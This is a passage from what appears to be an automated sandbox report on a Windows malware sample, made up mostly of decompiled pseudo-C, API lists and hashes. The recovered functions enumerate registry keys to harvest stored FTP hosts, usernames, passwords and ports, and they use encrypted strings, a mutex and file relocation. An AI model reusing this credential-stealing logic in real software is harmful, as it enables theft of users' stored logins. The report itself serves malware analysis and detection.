            							_t22 = E00410882( &_v1036 | 0xffffffff,  &_v1036);
            						}
            					}
            					FreeLibrary(_v12);
            				}
            				return _t22;
            			}
            0x004122dc
            0x004122de
            0x004122e4
            0x004122e9
            0x004122f1
            0x004122f9
            0x004122ff
            0x00412306
            0x0041230c
            0x0041230d
            0x00412310
            0x0041231a
            0x0041231f
            0x00412321
            0x00412321
            0x00412327
            0x0041233d
            0x0041233d
            0x0041233f
            0x00412343
            0x00412343
            0x0041234d

            APIs
            • LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 004122DE
            • GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 004122F1
            • FreeLibrary.KERNEL32(?), ref: 00412343
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Library$AddressFreeLoadProc
            • String ID: ObtainUserAgentString$urlmon.dll
            • API String ID: 145871493-2685262326
            • Opcode ID: 4b3f1af66c4ce0bcd88c8d74e9aeb89e72bfbe725b22fa6431f3d332f105cdf5
            • Instruction ID: e84c6d918167b2fc21815cd409f04a98974ffb3c171ad824036f5af67a46dcfa
            • Opcode Fuzzy Hash: 4b3f1af66c4ce0bcd88c8d74e9aeb89e72bfbe725b22fa6431f3d332f105cdf5
            • Instruction Fuzzy Hash: C001AC71900259AFCB109FF49E845DE7BBCAB08300F2000BBF655F3250DA788F848B68
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 78%
            			E00409C06(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
            				void* _v8;
            				signed int _v12;
            				signed int _v16;
            				signed int _v20;
            				signed int _v24;
            				signed int _v28;
            				char _v32;
            				char _v36;
            				char _v40;
            				char _v44;
            				char _v48;
            				char _v60;
            				char _v72;
            				char _v84;
            				char _v104;
            				char _v112;
            				char _v152;
            				char _v672;
            				void* __edi;
            				void* __esi;
            				signed int _t75;
            				intOrPtr* _t78;
            				signed int _t79;
            				intOrPtr* _t80;
            				void* _t82;
            				signed int _t85;
            				void* _t87;
            				intOrPtr* _t89;
            				signed int _t90;
            				void* _t91;
            				intOrPtr* _t93;
            				signed int _t94;
            				void* _t95;
            				intOrPtr* _t97;
            				signed int _t98;
            				void* _t99;
            				intOrPtr* _t101;
            				signed int _t102;
            				signed int _t103;
            				signed int _t108;
            				void* _t110;
            				signed int _t114;
            				signed int _t116;
            				signed int _t124;
            				signed int _t126;
            				void* _t151;
            				signed int _t154;
            				intOrPtr* _t157;
            				char* _t158;
            				char* _t159;
            				char* _t160;
            				char* _t161;
            				intOrPtr _t163;
            
            				if(E00415D45( &(__edx[0x2c]),  &_v672, __ecx) == 0) {
            					L49:
            					return 1;
            				}
            				_t172 =  *__edx & 0x00000010;
            				if(( *__edx & 0x00000010) == 0) {
            					_t124 = E0041699E( &_v672, __eflags,  &_v672);
            					_v28 = _t124;
            					__eflags = _t124;
            					if(_t124 == 0) {
            						L48:
            						goto L49;
            					}
            					_t75 =  *((intOrPtr*)( *_t124 + 0xb4))(_t124,  &_v8);
            					__eflags = _t75;
            					if(_t75 != 0) {
            						L47:
            						 *((intOrPtr*)( *_t124 + 8))(_t124);
            						goto L48;
            					}
            					_t78 = _v8;
            					_t79 =  *((intOrPtr*)( *_t78 + 0x1c))(_t78,  &_v32);
            					__eflags = _t79;
            					if(_t79 != 0) {
            						L46:
            						_t80 = _v8;
            						 *((intOrPtr*)( *_t80 + 8))(_t80);
            						goto L47;
            					}
            					_t82 = 0x75;
            					E0040F369(_t82,  &_v112);
            					_t151 = 0xc;
            					_t85 = E00411145( &_v112, _v32, _t151);
            					__eflags = _t85;
            					if(_t85 != 0) {
            						_t157 = __imp__#6;
            						L45:
            						 *_t157(_v32);
            						goto L46;
            					}
            					_t158 =  &_v72;
            					_t87 = 0x76;
            					E0040F369(_t87, _t158);
            					_t89 = _v8;
            					_t133 =  *_t89;
            					_t90 =  *((intOrPtr*)( *_t89 + 0x94))(_t89, _t158,  &_v44);
            					__eflags = _t90;
            					if(_t90 != 0) {
            						_t22 =  &_v20;
            						 *_t22 = _v20 & 0x00000000;
            						__eflags =  *_t22;
            					} else {
            						_v20 = E00416A20(_t133,  &_v44);
            					}
            					_t159 =  &_v60;
            					_t91 = 0x77;
            					E0040F369(_t91, _t159);
            					_t93 = _v8;
            					_t134 =  *_t93;
            					_t94 =  *((intOrPtr*)( *_t93 + 0x94))(_t93, _t159,  &_v36);
            					__eflags = _t94;
            					if(_t94 != 0) {
            						_t30 =  &_v16;
            						 *_t30 = _v16 & 0x00000000;
            						__eflags =  *_t30;
            					} else {
            						_v16 = E00416A20(_t134,  &_v36);
            					}
            					_t160 =  &_v84;
            					_t95 = 0x78;
            					E0040F369(_t95, _t160);
            					_t97 = _v8;
            					_t135 =  *_t97;
            					_t98 =  *((intOrPtr*)( *_t97 + 0x94))(_t97, _t160,  &_v40);
            					__eflags = _t98;
            					if(_t98 != 0) {
            						_t126 = 0;
            						__eflags = 0;
            					} else {
            						_t126 = E00416A20(_t135,  &_v40);
            					}
            					_t161 =  &_v104;
            					_t99 = 0x79;
            					E0040F369(_t99, _t161);
            					_t101 = _v8;
            					_t136 =  *_t101;
            					_t148 = _t161;
            					_t102 =  *((intOrPtr*)( *_t101 + 0x94))(_t101, _t161,  &_v48);
            					__eflags = _t102;
            					if(_t102 != 0) {
            						_t43 =  &_v12;
            						 *_t43 = _v12 & 0x00000000;
            						__eflags =  *_t43;
            					} else {
            						_v12 = E00416A20(_t136,  &_v48);
            					}
            					_t103 = _v20;
            					__eflags = _t103;
            					if(_t103 == 0) {
            						_t157 = __imp__#6;
            						goto L37;
            					} else {
            						__eflags =  *_t103;
            						if( *_t103 == 0) {
            							L35:
            							_t157 = __imp__#6;
            							 *_t157(_v20);
            							L37:
            							__eflags = _v16;
            							if(_v16 != 0) {
            								 *_t157(_v16);
            							}
            							__eflags = _t126;
            							if(_t126 != 0) {
            								 *_t157(_t126);
            							}
            							__eflags = _v12;
            							if(_v12 != 0) {
            								 *_t157(_v12);
            							}
            							_t124 = _v28;
            							goto L45;
            						}
            						__eflags = _t126;
            						if(_t126 == 0) {
            							goto L35;
            						}
            						__eflags =  *_t126;
            						if( *_t126 == 0) {
            							goto L35;
            						}
            						_t153 = _v12;
            						__eflags = _v12;
            						if(_v12 == 0) {
            							goto L35;
            						}
            						_t108 = E0040970A(_t148, _t153);
            						__eflags = _t108;
            						if(_t108 <= 0) {
            							goto L35;
            						}
            						_t109 = _v16;
            						__eflags = _v16;
            						if(_v16 == 0) {
            							_t154 = 0;
            							__eflags = 0;
            						} else {
            							_t154 = E00410B54(_t109);
            						}
            						__eflags = _t154 - 1;
            						if(_t154 < 1) {
            							L30:
            							_t154 = 0x15;
            							goto L31;
            						} else {
            							__eflags = _t154 - 0xffff;
            							if(_t154 <= 0xffff) {
            								L31:
            								_v24 = _v24 & 0x00000000;
            								_t110 = 0x2c;
            								E0040F369(_t110,  &_v152);
            								_push(_t154);
            								_push(_v20);
            								_push(_v12);
            								_t114 = E00411220( &_v24,  &_v152, _t126);
            								__eflags = _t114;
            								if(_t114 > 0) {
            									_t163 = _a4;
            									_t116 = E00410818(_t114, _t163, _v24);
            									__eflags = _t116;
            									if(_t116 != 0) {
            										_t56 = _t163 + 4;
            										 *_t56 =  *(_t163 + 4) + 1;
            										__eflags =  *_t56;
            									}
            								}
            								E00410418(_v24);
            								goto L35;
            							}
            							goto L30;
            						}
            					}
            				}
            				E00409BC3( &_v672, _a4, _t172);
            				goto L49;
            			}
            Instruction addresses: 0x00409c24, 0x00409e5f, 0x00409e63, 0x00409e63, 0x00409c2a, 0x00409c2d, 0x00409c4f, 0x00409c51, 0x00409c54, 0x00409c56, 0x00409e5e, 0x00000000, 0x00409e5e, 0x00409c63, 0x00409c69, 0x00409c6b, 0x00409e58, 0x00409e5b, 0x00000000, 0x00409e5b, 0x00409c71, 0x00409c7b, 0x00409c7e, 0x00409c80, 0x00409e4f, 0x00409e4f, 0x00409e55, 0x00000000, 0x00409e55, 0x00409c8c, 0x00409c8d, 0x00409c97, 0x00409c9a, 0x00409c9f, 0x00409ca1, 0x00409e43, 0x00409e49, 0x00409e4c, 0x00000000, 0x00409e4e, 0x00409ca9, 0x00409cac, 0x00409cad, 0x00409cb2, 0x00409cb5, 0x00409cbf, 0x00409cc5, 0x00409cc7, 0x00409cd6, 0x00409cd6, 0x00409cd6, 0x00409cc9, 0x00409cd1, 0x00409cd1, 0x00409cdc, 0x00409cdf, 0x00409ce0, 0x00409ce5, 0x00409ce8, 0x00409cf2, 0x00409cf8, 0x00409cfa, 0x00409d09, 0x00409d09, 0x00409d09, 0x00409cfc, 0x00409d04, 0x00409d04, 0x00409d0f, 0x00409d12, 0x00409d13, 0x00409d18, 0x00409d1b, 0x00409d25, 0x00409d2b, 0x00409d2d, 0x00409d3b, 0x00409d3b, 0x00409d2f, 0x00409d37, 0x00409d37, 0x00409d3f, 0x00409d42, 0x00409d43, 0x00409d48, 0x00409d4b, 0x00409d51, 0x00409d55, 0x00409d5b, 0x00409d5d, 0x00409d6c, 0x00409d6c, 0x00409d6c, 0x00409d5f, 0x00409d67, 0x00409d67, 0x00409d70, 0x00409d73, 0x00409d75, 0x00409e1b, 0x00000000, 0x00409d7b, 0x00409d7b, 0x00409d7f, 0x00409e0e, 0x00409e11, 0x00409e17, 0x00409e21, 0x00409e21, 0x00409e25, 0x00409e2a, 0x00409e2a, 0x00409e2c, 0x00409e2e, 0x00409e31, 0x00409e31, 0x00409e33, 0x00409e37, 0x00409e3c, 0x00409e3c, 0x00409e3e, 0x00000000, 0x00409e3e, 0x00409d85, 0x00409d87, 0x00000000, 0x00000000, 0x00409d8d, 0x00409d91, 0x00000000, 0x00000000, 0x00409d93, 0x00409d96, 0x00409d98, 0x00000000, 0x00000000, 0x00409d9a, 0x00409d9f, 0x00409da1, 0x00000000, 0x00000000, 0x00409da3, 0x00409da6, 0x00409da8, 0x00409db3, 0x00409db3, 0x00409daa, 0x00409daf, 0x00409daf, 0x00409db5, 0x00409db8, 0x00409dc2, 0x00409dc4, 0x00000000, 0x00409dba, 0x00409dba, 0x00409dc0, 0x00409dc5, 0x00409dc5, 0x00409dd1, 0x00409dd2, 0x00409dd7, 0x00409dd8, 0x00409ddd, 0x00409de6, 0x00409dee, 0x00409df0, 0x00409df2, 0x00409dfa, 0x00409dff, 0x00409e01, 0x00409e03, 0x00409e03, 0x00409e03, 0x00409e03, 0x00409e01, 0x00409e09, 0x00000000, 0x00409e09, 0x00000000, 0x00409dc0, 0x00409db8, 0x00409d75, 0x00409c38, 0x00000000

            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CombinePath
            • String ID:
            • API String ID: 3422762182-0
            • Opcode ID: 18a42e57422681588a1a7d9a7f7fa70672ddef84df9c4903b514d58febf243b6
            • Instruction ID: a4b5f7cb9a8cf618556ba2f56501364dc5f52b811903b9a6bd2a4601c8042949
            • Opcode Fuzzy Hash: 18a42e57422681588a1a7d9a7f7fa70672ddef84df9c4903b514d58febf243b6
            • Instruction Fuzzy Hash: FF716B31E00209ABDF10EBA1D844BEEB7B9AF84704F14847AE505B72D2D778AE45CB94
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 99%
            			E0040D2A3(WCHAR* __ecx, short _a4) {
            				char _v268;
            				signed int _v320;
            				char _v609;
            				signed short _v960;
            				char _v1052;
            				short _v1572;
            				short _v1576;
            				signed int _v1580;
            				short _v1584;
            				void* _v1588;
            				intOrPtr _v1592;
            				intOrPtr _v1596;
            				char _v1600;
            				intOrPtr _v1604;
            				long _v1608;
            				signed int _v1612;
            				void* _v1613;
            				signed int _v1616;
            				void* __ebx;
            				void* __esi;
            				signed int _t54;
            				void* _t55;
            				signed int _t63;
            				signed int _t65;
            				signed int _t67;
            				signed int _t74;
            				signed int _t77;
            				long _t78;
            				long _t79;
            				signed int _t83;
            				void* _t86;
            				signed int _t92;
            				signed int _t99;
            				signed int _t101;
            				signed char _t115;
            				signed int _t118;
            				short _t122;
            				void* _t125;
            				WCHAR* _t128;
            
            				_t119 = __ecx;
            				_t122 = _a4;
            				_t54 = E00403D00(__ecx,  *_t122, (0 |  *_t122 != 0x00000000) + 0x78d0c213, 2);
            				_v1612 = _t54;
            				if(_t54 != 0) {
            					_t55 =  *0x41a758; // 0x0
            					_v1588 = _t55;
            					_v1584 =  &_v268;
            					_v1596 = E0040D0FF;
            					_v1592 = E0040D23B;
            					_v1576 = _t122;
            					E00403E4D( &_v1052);
            					E00410454( &_v268,  &_v609, 0x102);
            					_t63 =  *_t122 & 0x000000ff;
            					__eflags = _t63;
            					if(_t63 == 0) {
            						_t65 = _v960 >> 0x10;
            						__eflags = _t65;
            						_v1608 = _t65;
            						_v1612 = _v960 & 0x0000ffff;
            						goto L7;
            					} else {
            						__eflags = _t63 != 1;
            						if(_t63 != 1) {
            							L7:
            							_t67 = _v1608;
            						} else {
            							_t119 = _v320 & 0x0000ffff;
            							_t67 = _v320 >> 0x10;
            							_v1612 = _v320 & 0x0000ffff;
            						}
            					}
            					_v1608 = _t67 * 0xea60;
            					_v1612 = _v1612 * 0xea60;
            					E004104CB( &_v1052,  &_v1052, 0, 0x310);
            					_v1584 = 0;
            					_t74 = E00403E39();
            					__eflags = _t74;
            					if(_t74 != 0) {
            						do {
            							__eflags =  *_t122;
            							_v1613 = 1;
            							if( *_t122 != 0) {
            								L23:
            								_t77 = E00405B98(_t119);
            								_t127 = _t77;
            								__eflags = _t77;
            								if(__eflags == 0) {
            									goto L32;
            								} else {
            									_v1612 = E00416037(0, _t120, __eflags, _t127, 0x4e23, 0x10000000);
            									E00410418(_t127);
            									__eflags = _v1616;
            									if(_v1616 == 0) {
            										L28:
            										_t115 = _v1613;
            									} else {
            										_v1580 = _v1580 & 0;
            										_t99 = E0040CEC4(_t119, _t120,  &_v1580, 1);
            										__eflags = _t99;
            										if(_t99 == 0) {
            											goto L28;
            										} else {
            											 *(_t122 + 8) =  *(_t122 + 8) | 0xffffffff;
            											_t101 = E0040D69A( &_v1600, _t119);
            											__eflags = _t101;
            											_t115 = (0 | _t101 != 0x00000000) - 0x00000001 & 0x00000002;
            											E00416468(_t122 + 8);
            											E00410418(_v1580);
            										}
            									}
            									E00410418(_v1600);
            									__eflags = _t115 - 2;
            									if(_t115 != 2) {
            										_t78 = _v1608;
            										__eflags = _t115;
            										if(_t115 != 0) {
            											goto L32;
            										}
            									} else {
            										_t78 = _v1612;
            									}
            								}
            							} else {
            								asm("sbb ebx, ebx");
            								E0040CD7B( !( ~(_v1572 & 0x0000ffff)) &  &_v1572, _t119, 0);
            								_t128 = _t122 + 0x122;
            								_t83 = GetFileAttributesW( &_v1576);
            								__eflags = _t83 - 0xffffffff;
            								if(_t83 == 0xffffffff) {
            									_t83 = GetFileAttributesW(0x41aa80);
            									__eflags = _t83 - 0xffffffff;
            									if(_t83 == 0xffffffff) {
            										goto L32;
            									} else {
            										_t119 = 0x41aa80;
            										goto L14;
            									}
            								} else {
            									_t119 =  &_v1572;
            									L14:
            									_t120 = _t128;
            									E004107C1(_t83 | 0xffffffff, _t119, _t120);
            									_t86 = E00415896(_t120, _t128);
            									__eflags = _t86 - 0xffffffff;
            									if(_t86 != 0xffffffff) {
            										L16:
            										__eflags = _t120;
            										if(__eflags > 0) {
            											goto L27;
            										} else {
            											if(__eflags < 0) {
            												L19:
            												__eflags = lstrcmpiW(_t128,  &_v1572);
            												if(__eflags == 0) {
            													goto L23;
            												} else {
            													_t118 = E00403D00(_t119, __eflags, 0x8793aef0, 2);
            													__eflags = _t118;
            													if(_t118 == 0) {
            														goto L32;
            													} else {
            														_t92 = MoveFileExW(_t128,  &_v1572, 0xb);
            														__eflags = _t92;
            														if(_t92 == 0) {
            															goto L32;
            														} else {
            															E00413A4E(_t118);
            															__eflags = _t92 | 0xffffffff;
            															_t119 =  &_v1576;
            															_t120 = _t128;
            															E004107C1(_t92 | 0xffffffff,  &_v1576, _t128);
            															goto L23;
            														}
            													}
            												}
            											} else {
            												__eflags = _t86 - 0xffffffff;
            												if(_t86 > 0xffffffff) {
            													goto L27;
            												} else {
            													goto L19;
            												}
            											}
            										}
            									} else {
            										__eflags = _t120;
            										if(_t120 == 0) {
            											L27:
            											E004158D7(_t128);
            											L32:
            											_t78 = 0x7530;
            										} else {
            											goto L16;
            										}
            									}
            								}
            							}
            							_t79 = WaitForSingleObject( *0x41a758, _t78);
            							__eflags = _t79 - 0x102;
            						} while (_t79 == 0x102);
            					}
            					E00413A4E(_v1604);
            					_t125 = 0;
            				} else {
            					_t125 = 1;
            				}
            				E00410418(_t122);
            				return _t125;
            			}
            Instruction addresses: 0x0040d2a3, 0x0040d2b2, 0x0040d2c6, 0x0040d2cb, 0x0040d2d1, 0x0040d2e7, 0x0040d2ec, 0x0040d2f7, 0x0040d302, 0x0040d30a, 0x0040d312, 0x0040d316, 0x0040d330, 0x0040d338, 0x0040d338, 0x0040d33a, 0x0040d35e, 0x0040d35e, 0x0040d361, 0x0040d36d, 0x00000000, 0x0040d33c, 0x0040d33c, 0x0040d33d, 0x0040d371, 0x0040d371, 0x0040d33f, 0x0040d33f, 0x0040d34e, 0x0040d351, 0x0040d351, 0x0040d33d, 0x0040d37b, 0x0040d38e, 0x0040d39b, 0x0040d3a2, 0x0040d3a7, 0x0040d3ac, 0x0040d3ae, 0x0040d3b4, 0x0040d3b4, 0x0040d3b7, 0x0040d3bc, 0x0040d48d, 0x0040d48d, 0x0040d492, 0x0040d494, 0x0040d496, 0x00000000, 0x0040d49c, 0x0040d4af, 0x0040d4b3, 0x0040d4b8, 0x0040d4bc, 0x0040d503, 0x0040d503, 0x0040d4be, 0x0040d4be, 0x0040d4c9, 0x0040d4ce, 0x0040d4d0, 0x00000000, 0x0040d4d2, 0x0040d4d5, 0x0040d4dc, 0x0040d4e1, 0x0040d4e8, 0x0040d4eb, 0x0040d4f4, 0x0040d4f4, 0x0040d4d0, 0x0040d50b, 0x0040d510, 0x0040d513, 0x0040d51b, 0x0040d51f, 0x0040d521, 0x00000000, 0x00000000, 0x0040d515, 0x0040d515, 0x0040d515, 0x0040d513, 0x0040d3c2, 0x0040d3c9, 0x0040d3d5, 0x0040d3e5, 0x0040d3eb, 0x0040d3ed, 0x0040d3f0, 0x0040d3fd, 0x0040d3ff, 0x0040d402, 0x00000000, 0x0040d408, 0x0040d408, 0x00000000, 0x0040d408, 0x0040d3f2, 0x0040d3f2, 0x0040d40d, 0x0040d410, 0x0040d412, 0x0040d418, 0x0040d41d, 0x0040d420, 0x0040d42a, 0x0040d42a, 0x0040d42c, 0x00000000, 0x0040d432, 0x0040d432, 0x0040d43d, 0x0040d449, 0x0040d44b, 0x00000000, 0x0040d44d, 0x0040d459, 0x0040d45b, 0x0040d45d, 0x00000000, 0x0040d463, 0x0040d46b, 0x0040d471, 0x0040d473, 0x00000000, 0x0040d479, 0x0040d47a, 0x0040d47f, 0x0040d482, 0x0040d486, 0x0040d488, 0x00000000, 0x0040d488, 0x0040d473, 0x0040d45d, 0x0040d434, 0x0040d434, 0x0040d437, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0040d437, 0x0040d432, 0x0040d422, 0x0040d422, 0x0040d424, 0x0040d4fb, 0x0040d4fc, 0x0040d523, 0x0040d523, 0x00000000, 0x00000000, 0x00000000, 0x0040d424, 0x0040d420, 0x0040d3f0, 0x0040d52f, 0x0040d535, 0x0040d535, 0x0040d3b4, 0x0040d544, 0x0040d549, 0x0040d2d3, 0x0040d2d5, 0x0040d2d5, 0x0040d2d7, 0x0040d2e4

            APIs
              • Part of subcall function 00403D00: CreateMutexW.KERNEL32(0041A2C8,00000000,?,?,?,?,?), ref: 00403D21
            • GetFileAttributesW.KERNEL32(?,00000000,?,00000000,00000310,?,?,00000102), ref: 0040D3EB
            • lstrcmpiW.KERNEL32(?,?,?), ref: 0040D443
            • MoveFileExW.KERNEL32(?,?,0000000B,8793AEF0,00000002), ref: 0040D46B
              • Part of subcall function 00410418: HeapFree.KERNEL32(00000000,00000000,00411C0D,00000000,?,?,?,?,0040373A,00000000,00403AF4), ref: 0041042B
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: File$AttributesCreateFreeHeapMoveMutexlstrcmpi
            • String ID:
            • API String ID: 1600310851-0
            • Opcode ID: aa1a35374e280e0549fbe7f6ac3adfeff7045c7975040aab1e344b5d27d27473
            • Instruction ID: 141fdc3b59a9f30e1d611daaf600479c39b2320570823e61d4fdaf8e07618e79
            • Opcode Fuzzy Hash: aa1a35374e280e0549fbe7f6ac3adfeff7045c7975040aab1e344b5d27d27473
            • Instruction Fuzzy Hash: A46115719043416AD310EFA4CC81AAFBBD8EF45318F100A3FF994A61D1D778DA89879B
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E00408F31(char* __ecx, void* __edx) {
            				void* _v8;
            				int _v12;
            				signed int _v16;
            				int _v20;
            				void* _v24;
            				intOrPtr _v28;
            				char _v32;
            				intOrPtr _v36;
            				intOrPtr _v40;
            				intOrPtr _v44;
            				intOrPtr _v48;
            				intOrPtr _v56;
            				intOrPtr _v60;
            				char _v64;
            				char _v84;
            				char _v104;
            				char _v124;
            				char _v148;
            				char _v188;
            				short _v276;
            				short _v796;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* _t69;
            				void* _t71;
            				intOrPtr _t75;
            				intOrPtr _t76;
            				void* _t78;
            				void* _t80;
            				void* _t82;
            				void* _t84;
            				void* _t86;
            				intOrPtr _t100;
            				int _t112;
            				void* _t119;
            				void* _t122;
            				int _t128;
            				void* _t132;
            				void* _t140;
            				void* _t143;
            				void* _t144;
            
            				_t127 = __edx;
            				_t125 = __ecx;
            				_t128 = 0;
            				E004104CB( &_v32,  &_v32, 0, 8);
            				_t69 = HeapAlloc( *0x41bc68, 8, 0xc20);
            				_v24 = _t69;
            				if(_t69 == 0) {
            					L22:
            					_t164 = _v28 - _t128;
            					if(_v28 > _t128) {
            						_t134 =  &_v64;
            						_t71 = 0x66;
            						E0040F369(_t71,  &_v64);
            						E0040D929(_t134, _v32, _t127, _t164, _t134);
            					}
            					return E00410418(_v32);
            				} else {
            					_t75 = _t69 + 0x1fe;
            					_v40 = _t75;
            					_t76 = _t75 + 0x1fe;
            					_v36 = _t76;
            					_v44 = _t76 + 0x1fe;
            					_t78 = 0x61;
            					_v60 = 0x80000001;
            					_v56 = 0x80000002;
            					E0040F369(_t78,  &_v276);
            					_t80 = 0x62;
            					E0040F369(_t80,  &_v124);
            					_t82 = 0x63;
            					E0040F369(_t82,  &_v148);
            					_t84 = 0x64;
            					E0040F369(_t84,  &_v104);
            					_t86 = 0x65;
            					E0040F369(_t86,  &_v84);
            					_v16 = 0;
            					do {
            						if(RegOpenKeyExW( *(_t143 + _v16 * 4 - 0x38),  &_v276, _t128, 8,  &_v8) != 0) {
            							goto L20;
            						}
            						_v20 = _t128;
            						_v12 = 0x104;
            						if(RegEnumKeyExW(_v8, _t128,  &_v796,  &_v12, _t128, _t128, _t128, _t128) != 0) {
            							L19:
            							RegCloseKey(_v8);
            							goto L20;
            						} else {
            							goto L4;
            						}
            						L17:
            						_v12 = 0x104;
            						if(RegEnumKeyExW(_v8, _v20,  &_v796,  &_v12, 0, 0, 0, 0) == 0) {
            							L4:
            							_v20 = _v20 + 1;
            							_t100 = E004143B6(_v8, 0xff, _t125, _v24,  &_v796,  &_v124);
            							_v48 = _t100;
            							if(_t100 != 0xffffffff && _t100 > 0) {
            								_t140 = E004143B6(_v8, 0xff, _t125, _v40,  &_v796,  &_v104);
            								if(_t140 != 0xffffffff && _t140 > 0) {
            									_t131 = _v36;
            									_t112 = E004143B6(_v8, 0xff, _t125, _v36,  &_v796,  &_v84);
            									_v12 = _t112;
            									if(_t112 != 0xffffffff && _t112 > 0 && E00408E76(_t127, _t131, _t140 + _v48) > 0) {
            										_t132 = E0041442C(_v8, _t125,  &_v796,  &_v148);
            										if(_t132 < 1 || _t132 > 0xffff) {
            											_t132 = 0x15;
            										}
            										_t142 =  &_v188;
            										_t119 = 0x2c;
            										E0040F369(_t119,  &_v188);
            										_push(_t132);
            										_push(_v24);
            										_t133 = _v44;
            										_push(_v36);
            										_push(_v40);
            										_t127 = 0x311;
            										_t122 = E004111A5(_t142, 0x311, _v44, _t142);
            										_t144 = _t144 + 0x14;
            										if(_t122 > 0) {
            											_t125 =  &_v32;
            											if(E00410818(_t122,  &_v32, _t133) != 0) {
            												_v28 = _v28 + 1;
            											}
            										}
            									}
            								}
            							}
            							goto L17;
            						} else {
            							_t128 = 0;
            							goto L19;
            						}
            						L20:
            						_v16 = _v16 + 1;
            					} while (_v16 < 2);
            					E00410418(_v24);
            					goto L22;
            				}
            			}
            Instruction addresses for the C-Code above: 0x00408f31 to 0x00409183.

            APIs
            • HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008,?,?,00000001), ref: 00408F58
            • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,?,00000001), ref: 00408FE9
            • RegEnumKeyExW.ADVAPI32 ref: 00409014
            • RegCloseKey.ADVAPI32(?,?,?,00000001), ref: 00409141
              • Part of subcall function 004143B6: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,?,0040F571,?,00000017,.exe,00000000,00000000), ref: 004143C9
            • RegEnumKeyExW.ADVAPI32 ref: 0040912E
              • Part of subcall function 0041442C: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0040BFB8,?,?), ref: 00414444
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Open$Enum$AllocCloseHeap
            • String ID:
            • API String ID: 3287537325-0
            • Opcode ID: 7d5d053bee7caadb2400416d617ff1a795b1669c455758070fcdad256cc20b5e
            • Instruction ID: 80f34b2e680f874422ff8504da72e961bda3c1f56b0e1d22a48561dd2b74b2da
            • Opcode Fuzzy Hash: 7d5d053bee7caadb2400416d617ff1a795b1669c455758070fcdad256cc20b5e
            • Instruction Fuzzy Hash: 58618D71E00219ABDB20DBA5CD45AEEB7B9EB48310F100476F910F7292D7389E858B98
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			// Enumerates the subkeys of the HKCU key named by decrypted string 0x6e (opened with
            			// KEY_ENUMERATE_SUB_KEYS = 8). For each subkey E004143B6 reads three string values (names
            			// 0x6f, 0x71, 0x72; at most 0xff wide chars each, into slices of the 0xc20-byte heap block)
            			// and E0041442C reads a value (name 0x70) treated as a port: anything outside 1..0xffff is
            			// replaced by 0x15 (21, the FTP control port). Entries whose third string is non-empty are
            			// formatted with string 0x2c into a 0x311-char buffer and appended to the list _v28 via
            			// E00410818; if any were collected the list is handed to E0040D929 with string 0x73.
            			// Returns whatever E00410418(_v28), the list release, returns.
            			E004094E0(char* __ecx) {
            				void* _v8;
            				int _v12;
            				void* _v16;
            				int* _v20;
            				intOrPtr _v24;
            				char _v28;
            				intOrPtr _v32;
            				char* _v36;
            				intOrPtr _v40;
            				char _v48;
            				char _v60;
            				char _v72;
            				char _v84;
            				char _v100;
            				char _v140;
            				short _v204;
            				short _v724;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* _t59;
            				intOrPtr _t60;
            				char* _t61;
            				void* _t63;
            				void* _t65;
            				void* _t67;
            				void* _t69;
            				void* _t71;
            				void* _t78;
            				int _t89;
            				int _t97;
            				int _t101;
            				void* _t107;
            				void* _t110;
            				int* _t116;
            				char* _t119;
            				void* _t120;
            				void* _t129;
            
            				_t113 = __ecx;
            				_t116 = 0;
            				E004104CB( &_v28,  &_v28, 0, 8);
            				_t59 = HeapAlloc( *0x41bc68, 8, 0xc20);
            				_v16 = _t59;
            				if(_t59 == 0) {
            					return _t59;
            				}
            				_t60 = _t59 + 0x1fe;
            				_v32 = _t60;
            				_t61 = _t60 + 0x1fe;
            				_v36 = _t61;
            				_v40 = _t61 + 0x1fe;
            				_t63 = 0x6e;
            				E0040F369(_t63,  &_v204);
            				_t65 = 0x6f;
            				E0040F369(_t65,  &_v72);
            				_t67 = 0x70;
            				E0040F369(_t67,  &_v84);
            				_t69 = 0x71;
            				E0040F369(_t69,  &_v60);
            				_t71 = 0x72;
            				E0040F369(_t71,  &_v48);
            				if(RegOpenKeyExW(0x80000001,  &_v204, 0, 8,  &_v8) != 0) {
            					L20:
            					E00410418(_v16);
            					_t147 = _v24 - _t116;
            					if(_v24 > _t116) {
            						_t127 =  &_v100;
            						_t78 = 0x73;
